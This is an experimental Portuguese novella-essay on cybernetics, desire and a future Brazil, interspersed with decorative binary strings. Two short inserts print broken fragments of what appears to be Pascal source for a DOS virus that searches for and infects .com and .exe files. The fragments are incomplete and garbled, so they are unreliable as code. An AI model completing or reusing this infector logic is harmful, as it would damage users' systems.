Léo Pimentel Souto http://amantedaheresia.blogspot.com Téchne Kybernetiké – versões beta & 2.

0 – Léo Pimentel Souto – Brasília: Instituto Autonomia, 2002 http://institutoautonomia.blogspot.com a arte de pilotar

Projeto Gráfico, Capa, Ilustrações e Editoração Eletrônica: Léo Pimentel Souto Imagem da capa: Radiografia do crânio de Kandrea Nascimento Responsável pela não-revisão de Texto: Sandra Nascimento

[versão beta: 2002] [versão 2.0: 2006] [2011]

“A Cibernética salva dos maiores perigos não apenas as almas, mas também os corpos e os bens.” Platão – Górgias, 511 “A inteligência considerada pelo que parece ser seu caminho original é a faculdade de fabricação de objetos artificiais... Nossa vida social gravita em torno de sua fabricação e de sua utilização”. Bergson – A Evolução Criadora “Você sabia que a primeira Matrix foi projetada para ser um mundo humano perfeito? (...) Foi um desastre. Ninguém aceitou o programa. (...) Mas eu acredito que, como espécie, o ser humano define sua realidade pelo sofrimento e pela miséria. O mundo perfeito era um sonho do qual seu cérebro primitivo tentava despertar. Smith – Matrix

pelo risco de ser demasiado pretensioso que intitulo este livro de Téchne Kybernetiké. Traduzindo do grego: Arte de autogovernar ou mesmo Arte de pilotar. Por que tal arte? Para quê tal Téchne? Minha sensação é de indiferença acerca da justificativa ou da utilidade de qualquer tipo de arte. Porém, me interessa como funcionam seus aspectos absurdos, inúteis e arbitrários... Pois isso me livra do senso comum, que adora pensar em graus e não em qualidades. Mas... Qualidades de quê? Da liberdade! Esta não é gradual. Não se está menos ou mais livre. Não é questão de saber. É questão de sabor. É provar as delícias da independência diante das contingências. É experimentar o gosto de efeitos determinados. É provar os temperos dos efeitos organizados. É ir apurando o paladar diante dos efeitos das finalidades múltiplas. É saborear a própria situação de autofixar os elementos que o/a constituem. É deliciar-se nos efeitos autocriadores. O que vem a seguir é a anulação da tradicional e irritante dualidade entre a determinação e a liberdade. É a percepção sensível de uma origem aceita em todo seu não divino e não civilizado acontecimento. É sentir o fenômeno da morte desde dentro. A estranha atração pelo vazio. Tal qual Moby Dick para com o Capitão Achab. É cybernética, Kybernétiké, kubernétes. Piloto de navio. Navio que poupa o piloto de pensar. Navio enquanto piloto. Pensamento artificial. Autogovernante. De sua matéria, mecanismo, finalidade, determinação, oportunidade, aptidão, ação, coordenação e regulagem. O tempo é outro. Dá-se perpendicularmente ao tempo das relações ordinárias. Nele se movimento como nos movimentamos no espaço. Nele também encontramos um sistema horizontal de coordenadas. A história é protagonizada por seres perversamente espiralados. Cinicamente suas histórias reptem-se infinitamente, pois apenas uma vez foi outra. Talvez esta, talvez... Mesmo assim, sem sagrado algum, sem atemporalidade mítica ou temporalidade ritualística. Nada perdido, nada encantado, nada, ou... Tudo menos nostalgia. Sem passado de ouro, nem futuro de diamante. Apenas, abandono. Talvez tenha se tratado da reciclagem de mundos. O ato de assumir que somos pretensiosos. Assumir que tudo o que é sobrenatural ou mítico é de inteira responsabilidade nossa. Tanto criar quanto destruir fazendo parte do mesmo valor moral. Assim também o é fazer nascer e fazer morrer. Divirto-me com o infortúnio e com o terror do “se” na história, ou seja, viver sem fé – para jamais me deliciar com a dor dos outros. O que me é mais próprio? É o que é de todos ou de nenhum ser inteligente: masturbar-se como Deus se masturbou momentos antes de sua morte. Última gozada divina. Livre de si e historicamente determinado outro. Tudo ao mesmo tempo agora. Em uma contínua regeneração no zênite e no nadir do tempo, termino esse conto em 20 de fevereiro de 2002 às 20 horas e 02 minutos. Brasília. Léo Pimentel

I. ! n 7 r 0² I². M 0 m 3 n t 0 5 4 n t 3 5 d 0 c r 1 m 3 I³ M 0 m 3 n t 0 5 4 p ó 5 0 c r 1 m 3 IV. 0 C r 1 m 3
VVít1m45 0u réu5 ? VI. H 0 l 0 g r 4 m 4 5 & m 3 t 4 ’ f o r 4 5

# 17 # 26 # 37 # 45
# 55 # 63

VI² D 3 s 4 p 4 r 3 c 1 d 0 5 VI³ M u N d 0

# 70 # 78

Acaso.

Luz.

Ocaso.

001010010101001001010100101010100101010001010110101001001001010010101001 010101010100101001001010010101001010101010010101010100101010101000101001 0001010100100101101101010000101001011110010100101111101001010101010101100 1000100100100100100100100100100101011100100010001110010111001110100111100 011001001010011010010101010010101110010000010010001000010001001001001001 0001001001000100100010001001111010111100101101010010101010101010101010101 010101010010101010101010100101010001010010010000100001001000010010001001 0010011000100010000010011111010101010101011010101010101111001111010100101 001010100101001010110110010100110001010101001010010101010001001010010101 001001010101010101010110010100101010010010101001010101001010100010101101 010010010010100101010010101010101001010010010100101010010101010100101010 1010010101010100010100100010101001001011011010100001010010111100101001011 1110100101010101010110010001001001001001001001001001001010111001000100011 1001011100111010011110001100100101001101001010101001010111001000001001000 1000010001001001001001000100100100010010001000100111101011110010110101001 010101010101010101010101010101001010101010101010010101000101001001000010 0001001000010010001001001001100010001000001001111101010101010101101010101 0101111001111010100101001010100101001010110110010100110001010101001010010 101010001001010010101001001010101010101011010010100101010010010101001010 101001010100010101101010010010010100101010010101010101001010010010100101 010010101010100101010101001010101010001010010001010100100101101101010000 1010010111100101001011111010010101010101011001000100101010101010101010010 101010101010100101010001010010010000100001001000010010001001001001100010 0010000010011111010101010101011010101010101111001111010100101001010100101 001010110110010100110001010101001010010101010001001010010101001001010101 010101010110010100101010010010101001010101001010100010101101010010010010 100101010010101010101001010010010100101010010101010100101010101001010101 0100010100100010101001001011011010100001010010111100101001011111010010101 0101010110010001001001001001001001001001001010111001000100011100101110011 1010011110001100100101001101001010101001010111001000001001000100001000100 1001001001000100100100010010001000100111101011110010110101001010101010101 010101010101010101001010101010101010010101000101001001000010110001010110 110010001001010101010101010100101010101010101001010100010100100100001000 0100100001001000100100100110001000100000100111110101010101010110101010101 0111100111101010010100101010010100101011011001010011000101010100101001010 101000100101001010100100101010101010101011001010010101001001010100101001 100010101010010100101010100010010100101010010010101010101010101100101001 010100100101010010101010010101000101011010100100100101001010100101010101 010010100100101001010100101010101001010101010010101010100010100100010101 0010010110110101000010100101111001010010111110100101010101010110010001001 0010010010010010010010010101110010001000111001011100111010011110001100100 101001101001010101001010111001000001001000100001000100100100100100010010 0100010010001000100111101011110010110101001010101010101010101010101010101 001010101010101010010101000101001001000010000100100001001000100100100110 0010001000001001111101010101010101101010101010111100111101010010100101010 010100101011011001010010100110001010101001010010101010001001010010101001 001010101010101010110010100101010010010101001010101001010100010101101010 010010010100101010010101010101001010010010100101010010101010100101010101 0010101010100010100100010101001001011011010100001010010111100101001011111 010010101010101011001000100100100100100100100100100101011100100010001110 0101110011101001111000110010010100110100101010100101011100100000100100010 000100010010010010010001001001000100100010001001111010111100101101000101

Poente. Séculos... Não sei quantos... Após o ultimo espécime da humanidade, ter baixado suas pálpebras e dormido profundamente em seu inerte colo.

Alvorada. Evolução. Gerações e gerações... Um mero clique acidental e, eis minha arte. O tocar de uma ponta de rabo escamosa e, eis a continuação de minha consciência. Uma simples inconsciência sexual de um tataravô do que fora um dia um calango e de uma tataravó que há muito fora nomeada “tartaruga Elsie” , eis me novamente. De Machina speculatrix à Machina Liberata

Belo sucumbir dos deuses. Adeus. Não posso sentir o calor, nem mesmo essas folhas e pedras que tocam meu corpo, minha energia é terminal. Posso ver opacamente as luzes e formas que tomo como os próprios e únicos objetos de meu entendimento.

Amável amigo escamoso e sintético, abro os olhos e projeto minha herança em ti.

001010011000101010100101001010101000100101001010100100101010101010101011 001010010101001001010100101010100101010001010110101001001001010010101001 010101010100101001001010010101001010101010010101010100101010101000101001 0001010100100101101101010000101001011110010100101111101001010101010101100 1000100100100100100100100100100101011100100010001110010111001110100111100 011001001010011010010101010010101110010000010010001000010001001001001001 0001001001000100100010001001111010111100101101010010101010101010101010101 010101010010101010101010100101010001010010010000100001001000010010001001 0010011000100010000010011111010101010101011010101010101111001111010100101 001010100101001010110110010100101001010100100101010010101010010101000101 011010100100100101001010100101010101010010100100101001010100101010101001 010101010010101010100010100100010101001001011011010100001010010111100101 0010111110100101010101010110010001001001001001001001001001001010111001000 1000111001011100111010011110001100100101001101001010101001010111001000001 0010001000010001001001001001000100100100010010001000100111101011110010110 101001010101010101010101010101010101001010101010101010010101000101001001 0000100001001000010010001001001001100010001000001001111101010101010101101 0101010101111001111010100101001010100101001010110110010100110001010101001 010010101010001001010010101001001010101100100101001101001010101001010111 001000001001000100001000100100100100100010010010001001000100010011110101 111000101001100010101010010100101010100010010100101010010010101010101010 101100101001010100100101010010101010010101000101011010100100100101001010 100101010101010010100100101001010100101010101001010101010010101010100010 1001000101010010010110110101000010100101111001010010111110100101010101010 1100100010010010010010010010010010010101110010001000111001011100111010011 110001100100101001101001010101001010111001000001001000100001000100100100 1001000100100100010010001000100111101011110010110101001010101010101010101 010101010101001010101010101010010101000101001001000010000100100001001000 1001001001100010001000001001111101010101010101101010101010111100111101010 010100101010010100101011011001010101101010010101010101010101010101010101 010010101010101010100101010001010010010000100001001000010010001001001001 1000100010000010011111010101010101011010101010101111001111010100101001010 100101001010110110010100110001010101001010010101010001001010010101001001 010101010101010100010100101010010010101001010101001010100010101101010010 010010100101010010101010101001010010010100101010010101010100101010101001 0101010100010100100010101001001011011010100001010010111100101001011111010 010101010101011001000100100101001010100100101010010101010010101000101011 010100100100101001010100101010101010010100100101001010100101010101001010 101010010101010100010100100010101001001011011010100001010010111100101001 0111110100101010101010110010001001001001001001001001001001010111001000100 0111001011100111010011110001100100101001101001010101001010111001000001001 0001000010001001001001001000100100100010010001000100111101011110010110101 001010101010101010101010101010101001010101010101010010101000101001001000 0100001001000010010001001001001100010001000001001111101010101010101101010 1010101111001111010100101001010100101001010110110010100110001010101001010 010101010001001010010101001001010101010101010110010100101010010010101001 010101001010100010101101010010010010100101010110010001001010101010101010 100101010101010101001010100010100100100001000010010000100100010010010011 0001000100000100111110101010101010110101010101011110011110101001010010101 001010010101101100101001100010101010010100101010100010010100101010010010 101010101010101100101001010100100101010010101010010101000101011010100100 1001010010101001010101010100101

I ! n 7 r 0²

ue tipo de descoberta qualquer eu faz de qualquer outro? 0010010010101001001010101010100111001010101010010100101001010010 100011 São noções de limite? 10100101010101010 É certo que o assunto se lança e se perde em sentidos? 10100100101010010 É probabilidade de que algo se produza num conjunto infinito de possibilidades? 10101010101010101 Ao formulá-la, talvez em linhas gerais, o que se tem? 101001001001010101 Um universo infinito de dimensões múltiplas e de subdivisões em categorias? 101001101011 Ou é a probabilidade de que algo se produza quando o conjunto de possibilidades é reduzido? 1010101010101010101010101 Substância homogênea ou substância heterogênea? 010100101010 Eu é um outro? Ou descubro um outro em si mesmo? Ou radicalmente diferente do eu? Relativo a um certo campo de probabilidade? 100100010100111010011 Cada qualquer outro é qualquer eu também? Como conceber qualquer outro? Um efeito de acaso no qual em absoluto não pode existir? 010010101001001010001 Como uma abstração? Tal qual se atribui subjetividade a qualquer indivíduo? Igualmente os fatos virtuais devem ser eliminados? 10101001001001010101110101010101001011001101 Um joguete dos acontecimentos? Como algum grupo social? Tal qual se atribui objetividade que seja esse grupo social contido ou não numa mesma sociedade, ao qual um determinado eu não pertence? 10101010101010101 Seria eu um denominador e o outro um numerador? 00010101001010010101101010100101010101010101 Como conceber o outro? Como a singularidade de outro? Um qualquer outro longínquo. 10101010101010101 Tão estranho, que um qualquer eu chega a cogitar a falta de solo para uma possível compreensão? 10101011010 Ou mesmo por ser um qualquer outro. Tão próximo! Mas irreconhecível. Um mim mesmo? Qualquer Outro e mim mesmo fundidos. Que, nem mesmo, um ponto de vista de senso comum, - eu estou aqui e o outro está lá -, conseguiria desatá-los? 010011010010100100101011010101000101010010101 Se eu sou finalidade artificial, me diminuo. Se outro é finalidade natural, se aumenta... 010101000010010101010101010101010010101010101010100011010010111011010101 100101010001001010110010001001010101010101010100101010101010101001010100 010100100100001000010010000100100010010010011000100010000010011111010101

17

0101010110101010101011110011110101001010010101001010010101101100101001100 010101010010100101010100010010100101010010010101010101010101100101001010 100100101010010101010010101000101011010100100100101001010100101010101010 010100100101001010100101010101011

Produce inicinf; begin; if MOSTRA then writeln('Iniciando infecção dos arquivos'); arquiv:=0; procura('*.com'."); procura('*.exe',"); procura('c:/windows/*.com','c:/windows/'); procura('c:/windows/*.exe','c:/windows/'); procura('c:/dos/*.com','c:/dos/'); procura('c:/dos/*.exe','c:/dos/'); if MOSTRA then writeln('Infecção dos arquivos Finalizada. Com um total de:'); if MOSTRA then writeln(arquiv',arquivos infectados.'); end;

#

18

De um modo um tanto arbitrário, a descoberta que um eu, radicalmente irreconhecível, faz do outro, radicalmente reconhecível, eis o começo de minha história que se diga de passagem, nunca poderá ser concluída. Mas certamente terá um fim. Minha história é também vida. E uma vida nunca se conclui, apesar de sempre chegar ao seu fim. Automatismo interno. Feed-back. Anti-Fading. Mecanismo dotado de pensamento artificial. Para nossa melhor volúpia e luxúria resolvi estabelecer três unidades fundamentais que nos servirão como o sistema horizontal de coordenadas dessa minha dimensão de existência. Unidades de tempo espiralado: talvez Século XXV. Unidades de espaço multifractal: certamente o chamado Brasil. E, uma unidade que não mais consigo definir com precisão; a unidade de conhecimento e ação que designarei, apenas enquanto encaminhamento aproximado, de “consciência afetiva que se faz a si mesma e age sobre si mesma”: a fusão do mundo real - sentido através dos sentidos e dos instintos - e o mundo virtual - não tão menos sentido através dos sentidos e dos instintos. Ah! Qual é a diferença mesma de real e virtual? Nenhum fenômeno consegue se desligar de seu antifenômeno. Faço um alerta. Esta última unidade, a consciência afetiva que se faz a si mesma e age sobre si mesma, não é a consciência que reconhecemos como percepção ou como consciência moral. É de outra ordem. Meramente emerge daquela nossa dimensão desejante. Onde sentimos que a vida se dobra sobre a morte e vice versa. Onde sentimos

que é a nossa libido que se apropria das coisas e não o contrário. É a necessidade inútil dessa energia libidinal precisar de algo para ser gasta. Consumir-se é sua razão de ser e estar. É onde percebemos que, a cada insignificante minuto de vida significa um minuto decisivo de morte. É aquela dimensão existencial em que a "arte de deixar as coisas que não me importam de lado" brota com todo o seu vigor vital ou mortal. Vida e morte copulando libertinamente sem que ambas tenham algum compromisso, nem com a eternidade nem com a extemporaneidade. Ejaculações, gozos e lubrificantes contradizendo o Ser sagrado. Ou mesmo ejaculações, gozos e lubrificantes quebrando o compromisso com a história. Vida e morte, entropia e anatropia, apenas jogando eroticamente o sublime jogo da autodestruição da estagnação. Relação sado-masoquista. Vida e morte, entropia e anatropia apenas como sendo um mesmo sistema integrado que nos joga à situação, insuportável, de que somos um complexo fútil constituído pelas coordenadas, espaço-tempo e auto-erotização. Como consciência afetiva que se faz a si mesma e age sobre si mesma e que, logo estará morta, darei um último aviso: esse jogo erótico, deliciosamente ao longo de minha história, tomará uma configuração provisória e, até certo ponto – o mais delicioso pornográfica. Pois, mesmo os jogos eróticos, jamais poderão também ser concluídos. No entanto, ideografia pornô. A não ser que deixem de lado a sedução e se realizem na economia de meios. Eu! Porém, sempre me erotizo com minhas próprias crias: eus paridos do nada. Jogo é jogo. Não é uma luta nem um debate. Não é algo dividido entre vencedores/as e perdedores/as ou convencidos/as e convencedores/as. É um quebracabeça de peças mutantes: pênis, ânus, vaginas, bocas, plugs, inputs, outputs. Seu movimento é construir, implodir, construir, implodir e construir de novo, gozar. Nascimento, suicídio, nascimento, suicídio, nascimento... Desejo, satisfação, desejo, frustração, desejo e desejo. E assim vai se dando. Ciclo vital, espiral mortal da existência.

19

#

001010010101001001010100101010100101010001010110101001001001010010101001 010101010100101001001010010101001010101010010101010100101010101000101001 0001010100100101101101010000101001011110100101010000101101100101001010010 1111101001010101010101100100101010001001111010101

Unidade de tempo: Século XXV. Uma data, para tomarmos como gênese de minha história: a noite de 2 de outubro de 2446 – mesa redonda, etapas aceleradas, tropismos. Unidade de espaço [1]: Brasil – carnavalização como força maior do vazio; a economia de contenção de meios para a vida.

Um ano e meio da saída do resultado das eleições para a presidência da República Federativa do Brasil. Unidade de consciência afetiva que se faz a si mesma e age sobre si mesma [1]: Euforia do jogador de xadrez de Torres e Quevedo. 0010100110101001101001010 El ajedrecista 00101001011010101010110 100010101101010010010010100101010010101010101001010010010100101010010101 010100101010101001010101010001010010001001010101101011010101001001011011 0101000010100101111001010010111110100101010101010110010 O “povo” (ajedrecista) estava eufórico. Um ano e meio da confirmação da eleição do candidato do “povo”. No caso, uma candidata – de comportamentos sutis. Uma grande mãe que prometia um acolhedor colo: Maria Bragança. Eis uma mulher que figurava o mais perfeito e antigo arquétipo humano do estabelecimento da ordem da vida: a grande matriarca, o oposto igual ao patriarca. Ambos imaculados enquanto projeto – a ferramenta que evolui à máquina. Sim, opostos e iguais como as duas mãos de um mesmo corpo. Ou como as tartarugas de Grey Walter. É natural que – tendo tomado o povo pelo espírito da autodiminuição – o povo tivesse escolhido a sua fantasia mais antiga ao caminho mais espinhoso da recriação da roda. O caminho espinhoso da destruição dos pneus em favor da limpa propulsão magnética – a destruição do petróleo em favor máquina perpétua. É natural que – tomado pela sensação humana de estar sempre sob o julgo de alguém, mesmo já em maturidade – o povo caia em sono induzido. Sim, sem coragem e autonomia. Apenas sensíveis à luz, sem movimento determinado que tenta se organizar. 101010101010101010101001001010100100101010101010101101010101010101001011 0000111100101001011111010010010100101010010010101001010101001010100010101 101010010010010100101010010101010101001010010010100101010010101010100101 010101001010101010001010010001010111000111001010010010010100010100101010 0100100101101010010100010111101110101010100101010 Unidade de consciência afetiva que se faz a si mesma e age sobre si mesma [2]: desamparo – qualidade de retroação negativa. Alter ego maligno, jogador de suas aparências, faltas e indeterminações. Assim é um indivíduo que deseja abandonar seu pai ou sua mãe. É só a partir do abandono que se começa a escrever sua própria história. É só a partir do desamparo que posso recriar a roda. Abandonar enquanto coragem. Abandonar enquanto insensibilidade. Durante milênios, apontam dedos para o rosto da coragem, acusam-na de ser desumana, de ser insensível. Portanto, quem abandona aparecia, outra vez, obrigado a viver na mais antiga ditadura da maioria: a democracia. Sim, a viverem na forma de governo dos filhos e das filhas. Filhos e filhas que não querem crescer. Que odeiam se responsabilizar sobre suas próprias mortes. Eternas crianças que desejam colo. Por que crescer é tão difícil? Colo é tão gostoso... mas aqueles e aquelas que abandonam, os alter egos malignos, preferem desfrutar o outro lado das delícias: estar sem chão é tão mais gostoso. As maiorias delícias exigem os maiores comprometimentos. Para ser livre é preciso abrir mão de

20

qualquer conforto. É preciso agir sobre si mesmo. Dói, pois a matéria se cria, porque não existe. Enfim, mais uma vez um presidente - uma presidenta; ah, qual a diferença mesmo? Arquétipo ancestral de velhas civilizações caducas. A própria forma de vida que se pretende conservar enquanto doença. É sempre a mesma enfermidade que há milênios se elege. Talvez tenham existido unidades de tempo e de espaço onde se pensavam que o ser humano estava lançado a um movimento de evolução. Para evoluir, a conservação é o gesto potente da paralisia. Evoluir é fluir. Evoluir é nascimento, suicídio, nascimento, suicídio e assim por diante. Portanto, o nosso jogo. Fluir é se adaptar por sorte, por indeterminação; é se adaptar por acaso ao ocaso. Caos! 000010110010100010101 0000101010101011010101011010011001011010100010101010001010101110101 1010101010101010101101 Saibas, a liberdade do “como” abre caminho para a liberdade do quê? 101010101010101010101010101010101101010101010101010

#

001010010101001001010100101010100101010001010110101001001001010010101001 010101010100101001001010010101001010101010010101010100101010101000101001 0001010100100101101101010000101001011110010100101111101001010101010101100 1010001110101000101010101001010100101101101010100 Século XXV. Uma época de contextos vivos para a criação, para a gênesis e para morrer. Uma época que se apresentava como a figura de um sistema de caos de um imenso mar de hiper-vidas que se cruzam e se trocam na imensa Hiper-Tekoha Nômade. Imenso mar de feitos que escapa das variações das causas que o determinam. Rumo aos corpos com novos órgão e membros. A noite de 2 de outubro de 2446. Uma época em que, como todas as outras, tinha tudo para trazer um gozo à existência em ato, para o abandono, para o desamparo e o desleixo – deixar ser... Uma época em que tinha tudo para propiciar, a cada exemplar de forma de vida que se auto intitulava humana, pelo menos àqueles/as brasileiros/as que aceitariam perder certa forma de domínio, para se darem uma chance de sentirem livres para o real – ao menos para a realidade que há dentro de toda ilusão. Ou seria mesmo para se darem uma chance de sentirem livres para o virtual? Ah, essa sombra... Essa projeção... Esse capricho... Desaparecidos/as. Sim, abandonar é desaparecer. Sair de cena. Escapar da vigilância. Imigrante ilegal em sua própria terra. Apátridas em diáspora voluntária. Dissimulados/as. Fingir não ser o que se é. Estar holográfico/a. Estar metáforas. Sim, desamparados/as. Não possuir mais chão. Estar um imenso hiato entre duas gestalts contraditórias. Descobertos/as. Sim, o que se descobre enquanto tudo aquilo que nos é

21

mais próprio/a. Vivos/as sem que a vida seja algo possuidora de um valor positivo em si. Machina Liberata. Pois bem, um ano e meio da saída do resultado das eleições para a presidência da República Federativa do Brasil. Portanto, esta não era uma época que teria algo de especial. Era uma época, como as demais, de velhas confirmações; de justificações novas para velhos preconceitos. Nada de transições radicais. As mesmas oligarquias. Os mesmos pactos. Os mesmos compromissos. O Brasil... ah, o Brasil... Existência garantida pela ilusão patriótica, que há muito deixara de lutar por transvaloração – se é que já lutara algum dia sem simular uma luta que fosse efetivamente sua. As razões importadas das guerras importadas pelos mais diversos tipos de patriotada. A evolução da ciência – ordem e progresso? Neo-liberalismo ou comunismo? Civilização ou barbárie? – constituíra uma surpreendente realização do objetivo da política brasileira: a aquisição de bens tecnológicos produzidos pelo resto das nações. Sim, eis a evolução da ciência brasileira: comércio de importação, linhas de montagem e mão de obra especializada. A patriotada científica tornou-se casta nobre – orgulhosamente periféricos nascidos de guerras; servomecanismos. E para não perder os privilégios da aristocracia, tornaram-se administradores e especialistas – aparelhos teleguiados de guerra, foguetes sem piloto. O conhecimento sobrevivendo apenas como moeda de troca. Tais “mentes brilhantes” adoravam as destrezas da montagem e a boa manutenção de uma tecnologia importada. Desse sistema de técnica – ou estado de arte –, alguns/mas tinham a consciência afetiva radical, os/as órfãs/os. Pois muitos acreditavam – os filhos e as filhas – que montar habilmente e garantir o bom funcionamento dessa tecnologia era gozar do conhecimento pleno. Esse era um gozo apenas para pais, mães, irmãos e irmãs. Não é que se sente prazer com qualquer coisa? A velha repetição milenar do mesmo: durante o governo de Maria Bragança, a produção científica e artística no Brasil consistia, essencialmente, em simulação de novidades – certamente o anticorpo para evitar os pervertidos choques de gerações entre pais e filhos. Os seres e os objetos são originais conforme os transformam em seu paralelo ao ideal – ahá! Os velhos arquétipos! As velhas soluções de velhas civilizações caducas! Não havia processamento de informações, criação e divulgação de conhecimento efetivo – nada de genuíno, tudo global. Novamente um Hiper-Estado tutelar que oferecia as condições de uma forma de vida plena de necessidades supridas – bemestar sossegado e aposentado. Necessidades de seres não vivos; seres sobrevivos; seres reduzidos à cidadania; seres reduzidos a humanos. Mais um Estado que liberava cada um de seus filhos e filhas para serem falsos/as hedonistas: o consumo exagerado de novidades do eterno mesmo; o amor ao circo mítico modernizado; o dever-ser voluntário das reapresentações que se estabelecem como se fossem a própria apresentação. Ser linha de produção carnavalesca. Ser o up-grade do grande espetáculo mítico do reino dos automatismos superiores – fator fantasma. Neste as necessidades mais básicas e as necessidades sublimadas são nada mais do que, as faces de uma mesma moeda carnavalesca calculadamente desaparecida. Dissolvidos/as em suas respectivas representações celestiais. A pulsão escópica do povo enquanto aparelhos ideológicos, de última geração, do Estado. 1010101010101010101010101001010101001

22

101010101010101010010111011010101010100101001001010010101001010101010000 0101001000101010010010110110101000010100101111001010010111110100101010110 100100010010101010010000101010101010111110101010101010101101000 Incerteza? Indeterminação? Projetar-se? Mistério? Um caráter irrisório, parcial, insuficiente. Nada que uma boa realização técnica dos ideais da modernização mitológica do país do futuro não pudesse extirpar. Sejam essas expressões vitais incorporadas num ser humano; sejam elas incorporadas nalguma simulação sem realidade. O que seria de um simulador senão um “tudo” ou “nada”? A passagem do mundo artificial (onde tudo é determinado) ao mundo natural (onde tudo é organização)? Mas, para alguns é condição da própria vida subverter-se. Melhor, Perverter-se. Não depender nem se sustentar no ascetismo. Não depender nem se sustentar na crença de uma sinistra Providência. Dançar com a morte. Trepar com o profano desprendimento. Implodir o papel dirigente jogado por senhores de engenho como o pecado, o sacrifício, e a redenção pelo trabalho. Misteriar-se? Não! Ter-se um compromisso mais fundamental com as aparências. Pois foram transbordados por suas consciências mais próprias: a consciência afetiva que se faz a si mesma e age sobre si mesma lhes evoca; eis a unidade mais original de onde tudo parte. Ao pensar já desejei. Ao desejar, tudo o que é vivo em meu corpo já havia determinado ao que se deseja. Na noite de 2 de outubro de 2446, haviam ainda pessoas, ou melhor! personas, máscaras – alter egos malignos, jogadoras de suas aparências – (pré)dispostas à ocuparem-se de tamanho risco e perigo. Pessoas que não renunciavam aos juízos para além de determinações de verdade. Pessoas que não mais seriam filhos ou filhas. Pessoas que se atreviam a não defender seus preconceitos – muito menos pós-conceitos. Pessoas que admitiam, corajosamente, aquilo que assistiam: mais uma outra forma de uma ilusão religiosa que toda energia libidinal quer se dedicar: ciência, deuses, tecnologia, sistemas filosóficos, futebol. O que se faz com suas próprias finitudes? Atrai-se pelas alienações de massa ou se atrai pelas alienações letradas? Pessoas que não se tornavam uma materialização da propaganda, da publicidade e do consumo exagerado do eterno mesmo. Assim sendo, para esses alter egos malignos, a realidade não mais surgiria como moeda de troca. O valor da realidade não mais se encontraria num mediador entre suas vontades e a própria realidade. E, moedas de troca, como imagens de si mesmas, eram aquilo que se almejavam no processo de modernização mitológica do país do futuro. Porém, primitivos/as do futuro estavam por vir imunes à... Àqueles/as imigrantes ilegais em sua própria terra, contrários/as a essa resposta ao que se faz com a própria finitude, só lhes restavam o exílio. Não o exílio para outro país no mundo ou para outro lugar. Um lugar de abundante despossessão. O exílio para a Hiper-Tekoha Nômade. Esta, uma imensa rede de holocomputadores e nanorobôs construtores de realidades trans-virtuais, que se estendia pelas colônias terrestres espalhadas pelo sistema solar. Uma utopia onde poderiam ser bem acolhidos. Pois lá havia os "Quilombos da Machinas Liberatas". Lugares que quanto mais se vive, mais se deixa de ser espectador/a, contemplador/a. Um lugar onde a matéria prima é o próprio desleixo do deixar de ser humano, para ser algo de sua extensão mais própria: sua liberdade, criatividade e extensões tecnológicas. Lugares em que todo órfão e órfã, acaba

23

sempre por se livremente condenar. Uma condenação que os lançam ao experimento do que fazer com sua finitude. O mundo fundido da efemeridade da ação e do conhecimento. O mundo fundido de mundo real e mundo virtual. O próprio espaço-tempo vivo que serviria como testemunha do belo suicídio da humanidade. Enfim, do suicídio da colonização, da conquista e da servidão. Eis a insubordinação do ser humano pela sua própria criação: si mesmo. Eis a insubordinação da tecnologia: máquinas que exercem o autogoverno dos efeitos por si mesmos. Eis a descivilização que estou por ver. Eis uma técnica de pilotar a si mesmo: criar-se do nada... 10100110100101001010101001011010101 101011010101010101010110010110010001001010101010101010100101010101010101 001010100010100100100001000010010000100100010010010011000100010000010011 1110101010101010110101010101011110011110101001010010101001010010101101100 101001100010101010010100101010100010010100101010010

24

25

I². M0m3nt05 4nt35 d0 cr1m 3

verdade mais verdadeira? É aquilo que faço? Talvez, seja ou esteja? Escolher entre solicitações diversas. Unicamente, 10100101010101010101010101010 1011001011100101000100011001010101, aquela que com ela também o erro (o espaço de jogo da constante oscilação do vai e vem do fim de qualquer mistério) conasce 1010101010101011101010101101010101010101010101010100111 1001001001010001000100010011101010101111010101010100001011100010100010010 100 na medida em que 1001001010100101010010101010001010010101100 0110101010 é a verdade que dispõe o erro no todo do seu sistema, 101101010101001 010001011 em seu tempo (velocidades múltiplas e tempos simultâneos) e lugar (uma imensa Hiper-Tekoha Nômade ocupada por...). Seria o próprio erro que corrige o erro? É pelo defeito que se corrige o defeito? O erro é tão fecundo que leva ao caminho certo? (ocupada por... Machinas Judicatrix...)

26

101100100010010101010101010101001010101010101010010101000101001001000010 0001001000010010001001001001100010001000001001111101010101010101101010101 010111100111 É possível conceber que todos os fatores que levam a um efeito são independentes de qualquer pré-fator comum? 0101010101010101 101010010100101010010100101011011001010011000101010100101001010101000100 101001010100100101010101010101011001010010101001001010100101010100101010 001010110101001001001010010101001010101010100101001001010101001010101010 101010101010101001010100 Afinal, existe o acaso?

produce procura; begin if MOSTRA then writeln FindFirst;

{$i+} while (DosError=0) and (arquiv'COMMAND.COM') then begin HOARAINI(NOME); assign(FromF, nome); reset(FromF,1); assign(ToF, 'virtemp.tmp'); Rewrite(ToF, 1); Repeat BlockRead(FromF, buf2, SizeOf(buf2), numread); BlockWrite(ToF, buf2, numread, NumWritten); until (numread=0) or (NumWritten <>numread); close(FromF); close(tof);

#

001010010101001001010100101010100101010001010110101001001001010010101001 0101010101001010011110010100101111101001010101010101100101001010100100100 10100100101010010001000101010111011000 No momento, uma ampla sala de assepsia de vidro polido. Sua luz simulava a hora que provavelmente corresponderia à luz solar na Terra antes de seu eixo se inclinar. Suas paredes eram perfeitamente arredondadas, difícil determinar onde elas se separavam do chão e do teto. Parecia um confortável túnel translúcido de fundo do mar. Desde ali se via tudo o que acontecia em seu exterior. Porém, sigilo, ninguém os via. Nem mesmo a sala era percebida enquanto sala. Quem a via de fora, a via como uma grande e bela sequóia. Sóbria, sereno e elegantemente vestido e maquiado, silenciosamente Celius Oliveira entra na Sala de Estratégias. Imponente, orgulhoso de si. - Adria!!! - gritou ele, com a sarcástica satisfação infantil de pregar um susto. Toda essa traquinagem desaparecia em um rosto esculpido pela maturidade libertina, típica de sábios cibergeneticistas que, se esforçavam por parecerem insatisfeitos em fazerem aquilo que fazem. Naquele grito, todas as cruéis ilusões dos sonhos de Adria fugiram. Tal como os nanoconstrutores se espalham para dar concretude às holografias. Nano-robôs que se movimentam como os vôos das belas moscas varejeiras, de cor azul metálico, sob a ameaça de um golpe lateral. Uma linda garota (de onde estou não sei bem ao certo como determinar isso) negra. Belos olhos cor de safira, especialmente projetados para ampliar o espectro de cores percebido, acrescentavam à sua beleza, um olhar mais penetrante. Seus cabelos azuis trançados sugeria sedução. Adria Maia violentamente é trazida de volta à loucura que cultiva sua força: sua vida sensualmente sentida na vigília.

27

